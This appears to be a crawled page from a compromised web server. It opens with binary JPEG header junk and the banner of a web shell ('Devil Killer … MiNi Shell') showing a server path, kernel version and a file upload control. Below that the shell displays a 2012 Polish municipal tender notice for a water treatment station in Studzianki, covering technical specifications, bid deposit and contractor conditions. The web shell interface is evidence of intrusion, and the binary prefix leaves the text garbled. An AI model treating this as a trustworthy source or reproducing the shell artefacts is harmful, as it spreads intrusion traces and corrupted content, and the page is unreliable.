JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120920/357706-N-2012.html

<p class="kh_header"><b>Sadkowice: Budowa stacji uzdatniania wody w miejscowości Studzianki, gm. Sadkowice.</b><br>
<b>Numer ogłoszenia: 357706 - 2012; data zamieszczenia: 20.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sadkowice , Sadkowice 129A, 96-206 Sadkowice, woj. łódzkie, tel. 46 8156191, faks 46 8156191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.gminasadkowice.pl; http://www.gminasadkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa stacji uzdatniania wody w miejscowości Studzianki, gm. Sadkowice..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Projektowana stacja uzdatniania wody zlokalizowana będzie w projektowanym budynku technologicznym wg opracowania branży konstrukcyjnej.
W ramach inwestycji budowy stacji uzdatniania wody wykonane zostaną: budynek
technologiczny wyposażony w aerator ciśnieniowy, filtry ciśnieniowe i chlorownie, dwa naziemne stalowe zbiorniki wyrównawcze na wodę pitną o objętości 150 m3 każdy, dwa szczelne zbiorniki bezodpływowe na ścieki, urządzenia do odczyszczania ścieków technologicznych (wód popłucznych z filtrów ciśnieniowych) w postaci odstojnika z kręgów żelbetowych, urządzeń służących do odprowadzania oczyszczonych wód popłucznych do gruntu w postaci studni chłonnej wykonanej z kręgów żelbetowych i piasku o odpowiedniej granulacji na działce o numerze ewidencyjnym 313/2 obr. Studzianki, gm. Sadkowice.
Projektowany budynek stacji uzdatniania wody
Budynek zaprojektowany został dla urządzeń przystosowanych do uzdatniania
wody. W rzucie posiadać będzie kształt prostokąta o wym. 6,20x9,00m.
Posiadać będzie następujące pomieszczenia: halę technologiczną, chlorownię, w.c
Architektura budynku
Budynek zaprojektowany został z płyt warstwowych systemu Metalplast montowanych na konstrukcji stalowej.
Ściany zewnętrzne budynku - z płyt warstwowych grub. 100mm z rdzeniem styropianowym.
Płyty dachowe - z płyt warstwowych  grub. 190/150 z rdzeniem styropianowym. W poziomie płyt dachowych z czterech stron budynku zaprojektowano - attykę.
Posadowienie budynku zaprojektowano - na ławach fundamentowych betonowych, zbrojonych, ciągłych, wylewanych na mokro
UWAGA:
Profil okładzin zewnętrznych płyt warstwowych ściennych i ich kolor oraz kolor
okładzin zewnętrznych płyt warstwowych dachowych - w gestii inwestora.
Dopuszcza się zastosowania płyt osłonowych i dachowych innych typów o
równoważnych parametrach technicznych po uprzednim uzgodnieniu z projektantem.
Dane gabarytowe
Powierzchnia użytkowa - 52,10m 2
- hala technologiczna - 47,30m2
- chlorownia - 2,40m2
- w.c - 2,40m2
Powierzchnia zabudowy 62,00m 2
- budynek - 55,80m2
- podest - 6,20m2
Kubatura - 270,00m 3
Konstrukcja budynku
Konstrukcję budynku /do której będą mocowane płyty warstwowe ścienne i
dachowe/ zaprojektowano stalową z gatunku stali St3SX.
- słupy - z 2E140
- rygle - z T240
- płatwie - z E140
- ryglówki okienne i drzwiowe - 50x50x4
- ryglówki cokołowe - L100x100x8
Ławy fundamentowe
Ławy fundamentowe zaprojektowano betonowe z betonu B15, zbrojone stalą A-0, na podbudowie warstwy betonowej betonu B10 grub. 10cm i podsypki piaskowej stabilizowanej cementem grub. 5cm. Przekrój ław fundamentowych - 30x50cm.
Ściany fundamentowe
Ściany fundamentowe zaprojektowano betonowe z betonu B15 grub. 25cm
Ścianki wydzielające pomieszczenie chlorowni i w.c.
Ścianki wydzielające pom. chlorowni i w.c. od hali technologicznej - należy
wykonać na pojedynczej metalowej konstrukcji nośnej z opłytowaniem dwuwarstwowym. Grubość ścianki z opłytowaniem - 10cm.
Konstrukcja nośna:
- profile poziome - profil UW 50x06
- profile pionowe - profil CW 50x6
- naroża wewnętrzne - profil LW 60/60x06
Opłytowanie:
- płyty wodoodporne - 2x12,5cm
Izolacja wewnątrz ścianki
- akustyczna i przeciwpożarowa - wełna mineralna grub. 50Mm
Mocowanie płyt
- wkręty - dla 1warstwy dł. 25mm co 750m, dla 2warstw dł.35mm co 250mm
Fundamenty pod filtry stalowe i pod zestaw areacji
Fundamenty pod filtry stalowe i pod zestaw aeracji zaprojektowano betonowe z betonu B15, zbrojone stalą A-0.
Opaska
Opaskę wokół budynku należy wykonać betonową z betonu B15, szer. 50cm,
grub. 5cm, ze spadkiem 1% od budynku, na podsypce piaskowej grub. 5cm.
2.3.5. Instalacje w budynku
Budynek będzie wyposażony w instalacje: wodociągową, kanalizacyjną, wentylacyjną, oświetleniową i gniazd wtykowych, odgromową, uziomową.
2.3.7. Posadzki
W pomieszczeniu hali głównej i chlorowni należy wykonać posadzkę z gresu
przeciwpoślizgowego. W pomieszczeniu w.c. należy wykonać posadzkę z terakoty.
2.3.8. Okładziny
W pomieszczeniu chlorowni i w w.c. ścianki należy wyłożyć glazurą do
wysokości 2,00m od posadzki.
Ścianki powyżej glazury należy pomalować farbą emulsyjną.
UWAGA
Kolor płytek ceramicznych i wzór układania posadzek - w gestii inwestora
3.2. Fundament pod zbiorniki
Fundamenty pod dwa zbiorniki wyrównawcze o poj. 150m3 zaprojektowano o
średnicy D=4,60m grubości 90 cm z betonu B20 zbrojonego stalą AIII i AI.
Fundamenty posadowione na płycie betonowej z betonu B10 o śr. D=5,0m i grub. 30cm,
Ogrodzenie obiektu i utwardzenie terenu 
wg dokumentacji projektowej
Rodzaj (kształt) kostki na podjazdy, oraz kolor kostki na chodnik do uzgodnienia z Zamawiającym

Projektowane rozwiązanie technologiczne.
Budowa nowoprojektowanej stacji uzdatniania wody w m. Studzianki wymaga
wykonania robót w następującym zakresie:
1. Wykonanie obudowy studni i montażu nowego agregatu pompowego
2. Budowa dwóch zbiorników wyrównawczych na wodę czystą.
3. Budowa budynku technologicznego wraz z fundamentem pod zbiorniki wyrównawcze  
    wg branży konstrukcyjno-budowlanej
4. Zainstalowanie urządzeń instalacji technologicznych gwarantujących produkcję 
    wody o normatywnych parametrach w istniejącym układzie hydraulicznym. 
    Przewiduje się montaż następujących urządzeń:
    - filtry odżelaziaczy,
    - centralny mieszacz wodno-powietrzny (aerator),
    - zainstalowanie agregatu sprężarkowego,
    - zestaw pomp II-go st. z pompą płuczną wraz z rozdzielniami elektrycznosterowniczymi.

  Orurowanie stacji wykonać z rur i kształtek ze stali odpornej na korozję gatunku
  X5CrNi 18-10 (1.4301) zgodnie z PN-EN 100881. - nie dopuszcza się wykonania orurowania z innych materiałów (np. PCV, stal ocynkowana itp.)
5. Budowa głównej rozdzielni elektrycznej wraz z całą instalacją i ogrzewaniem 
     elektrycznym
6. Instalacji wodno- kanalizacyjnej, wentylacyjnej w chlorowni i w hali technologicznej.
Wykonawca zobowiązany jest również do wykonania wszelkich uzgodnień i zawiadomień w imieniu Zamawiającego. Za realizację zadania zgodnie z warunkami technicznymi wyłączną odpowiedzialność ponosi Wykonawca. 
Wykonawca zobowiązany jest do wykonania wszystkich elementów zadania określonych w projekcie budowlano-wykonawczym, przedmiarze robót oraz specyfikacji technicznej  wykonania i odbioru robót oraz niniejszej SIWZ.

Zakres prac objętych niniejszym zamówieniem  został określony  w projektach budowlano-wykonawczych, przedmiarach robót, specyfikacjach technicznych wykonania i odbioru robót i niniejszej SIWZ.  Przedmiot zamówienia należy wykonać zgodnie z dokumentacją  zatwierdzoną  decyzją  Starosty Rawskiego - pozwoleniem na budowę Nr  269/2010 z dnia 12.08.2010 r.

Wszelkie prace budowlane oraz inne czynności nie opisane w niniejszej specyfikacji istotnych warunków zamówienia i w załącznikach do niej, a niezbędne do właściwego i kompletnego wykonania przedmiotu zamówienia należy wykonać w ramach niniejszego zadania i uwzględnić w kalkulacji kosztów.

4.  Dodatkowe warunki realizacji przedmiotu zamówienia:

a) Zamówienie będzie współfinansowane w ramach działania 321 Podstawowe usługi dla gospodarki i ludności wiejskiej Program Rozwoju Obszarów Wiejskich na lata 2007 - 2013

b) Wykonawca przed złożeniem oferty cenowej oraz rozpoczęciem robót powinien dokładnie zapoznać się z dokumentacją łącznie z uzgodnieniami (wraz ze sprawdzeniem wszystkich wymiarów danych technicznych w projektach oraz ilości wymienionych w przedmiarze robót) a także dokonać oględzin terenu gdzie będzie realizowana inwestycja aby w razie stwierdzonych niejasności domagać się od Zamawiającego wyjaśnień;

c) Wykonawca, którego oferta zostanie wybrana,  zobowiązany jest skompletować i złożyć wnioski (zgłoszenia) do zarządcy drogi oraz uzyskać  zezwolenia na prowadzenia robót w pasach drogowych 
c) Jeżeli w załącznikach do SIWZ pojawią się ewentualne wskazania znaków towarowych, patentów lub pochodzenia, to określają one minimalny standard jakości materiałów lub urządzeń przyjętych przykładowo do wyceny. Zamawiający dopuszcza zastosowanie produktu innego producenta o parametrach równoważnych lecz nie gorszych niż przyjęto w dokumentacji technicznej. Wskazanie równoważności zaoferowanego produktu spoczywa na Wykonawcy. W celu wykazania równoważności proponowanej zamiennej technologii uzdatniania wody należy załączyć do oferty obliczenia, karty katalogowe, szczegółowe rysunki techniczne wszystkich elementów/urządzeń zamiennej technologii. Dla zestawów technologicznych: hydroforowego, aeracji i filtracji należy dołączyć atesty PZH na kompletne zestawy. Należy również wypełnić załącznik Nr 9 - wykaz oferowanych urządzeń i materiałów. Niniejsze dokumenty muszą w sposób jednoznaczny stwierdzać równoważność proponowanej zamiennej technologii w stosunku do przyjętej w projekcie oraz muszą być załączone do oferty. 

d) Zamawiający przewiduje płatności dla Wykonawcy po realizacji całego przedmiotu zamówienia,  w ciągu 30 dni licząc od dnia otrzymania przez Zamawiającego prawidłowo wypełnionej faktury, która będzie wystawiona przez Wykonawcę po odbiorze końcowym całego zadania i uzyskaniu pozwolenia na użytkowanie.
Zapłata będzie się odbywała na podstawie jednej faktury. Faktura wystawiona będzie po zrealizowaniu całego zadania w 2013 roku , lecz nie wcześniej niż w miesiącu kwietniu 2013 i nie później niż w miesiącu czerwcu 2013 . 

e) Oferta musi uwzględniać wszystkie koszty związane z prawidłową realizacją zamówienia. Przyjmuje się, że Wykonawca upewnił się co do prawidłowości i kompletności oferty, która powinna pokryć wszystkie jego zobowiązania umowne, a także wszystko to co może być konieczne dla właściwego wykonania  i wykończenia robót oraz usunięcia usterek.

f) Wykonawca dokonuje wszelkich zgłoszeń zajęcia pasa drogowego i pokrywa koszty z tym związane w okresie prowadzenia robót.

g) Wszystkie materiały przewidziane do zastosowania przy realizacji przedmiotowej inwestycji należy zgłosić koordynatorowi inspektorów nadzoru przynajmniej na 2 tygodnie przed wbudowaniem do zatwierdzenia w formie wniosku materiałowego zawierającego deklaracje zgodności oraz dokumenty potwierdzające spełnienie wymagań przewidzianych w dokumentacji projektowej oraz specyfikacjach technicznych.

h) Wykonawca zapewnia wykonanie  inwentaryzacji powykonawczej, która musi być przekazana Zamawiającemu najpóźniej w dniu odbioru końcowego robót. 

i)Wykonawca zobowiązany jest również do wykonania zadania zgodnie z wymogami określonymi w dokumentacji formalno-prawnej stanowiącej załącznik Nr 11 do SIWZ.

5. Wymagania stawiane Wykonawcy:

1. Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 

2. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.

3. Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. 

4. Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.
 

5. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. 

6. Uwagi końcowe:

Szczegółowy zakres robót został określony w  dokumentacji projektowej (projektach budowlano-wykonawczych), szczegółowych specyfikacjach technicznych wykonania i odbioru robót, przedmiarach robót, w niniejszej Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.20-5, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem przystąpienia do przetargu jest wniesienie wadium w wysokości 
30.000,00 PLN (słownie złotych: trzydzieści  tysięcy złotych 00/100 PLN). Wadium winno być wniesione w formie określonej w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
Dowód wniesienia wadium należy dołączyć do oferty. Oryginał należy załączyć luzem, a kopię trwale spiąć z ofertą.
W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na konto  BSBR O/Sadkowice nr: 09 9291 0001 0035 8648 2000 0010
z takim wyprzedzeniem, aby środki znajdowały się na koncie Zamawiającego przed otwarciem ofert.
Zwrot, zatrzymanie lub ponowne wniesienie wadium następuje na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony gdy Wykonawca złoży oświadczenie wg wzoru-załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony gdy Wykonawca  udokumentuje, że w  okresie określonym w dziale VI pkt  A4 niniejszej SIWZ Wykonawca należycie wykonał co najmniej 
1 robotę budowlaną o podobnym charakterze (budowa, przebudowa, modernizacja stacji uzdatniania wody o wydajności nie mniejszej niż 500 m3/dobę i wartość robót nie mniejszej niż 700.000 zł brutto) wg wzoru załącznik  nr 3</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Kierownik / Kierownicy budowy posiadali będą uprawnienia do kierowania robotami: 
- konstrukcyjno-budowlanej bez ograniczeń
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  
  gazowych, wodociągowych i kanalizacyjnych bez ograniczeń 
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i 
  elektroenergetycznych bez ograniczeń 
 na dowód tego Wykonawca składa  Oświadczenie wg wzoru załącznik nr 7 oraz Oświadczenie wg wzoru załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Kierownik / Kierownicy budowy posiadali będą uprawnienia do kierowania robotami: 
- konstrukcyjno-budowlanej bez ograniczeń
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  
  gazowych, wodociągowych i kanalizacyjnych bez ograniczeń 
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i 
  elektroenergetycznych bez ograniczeń 
 na dowód tego Wykonawca składa  Oświadczenie wg wzoru załącznik nr 7 oraz Oświadczenie wg wzoru załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony gdy wykonawca złoży oświadczenie wg wzoru-załącznik nr 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, zgodnie z art. 144 ustawy Prawo zamówień publicznych, przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
a) w przypadku zmiany osób wymienionych w § 5  umowy,
b) w przypadku konieczności wykonania robót  zamiennych. Roboty zamienne nie powodują zmiany ceny. Ich konieczność  zostanie potwierdzona wpisem do dziennika budowy przez Kierownika Budowy oraz inspektora nadzoru sprawującego nadzór nad inwestycją.
c) może nastąpić  zmiana okresu przewidzianego na ukończenie robót gdy:
1)	zmiany spowodowane są warunkami atmosferycznymi, w szczególności:
-klęski żywiołowe;
-warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych i dokonywanie odbiorów;
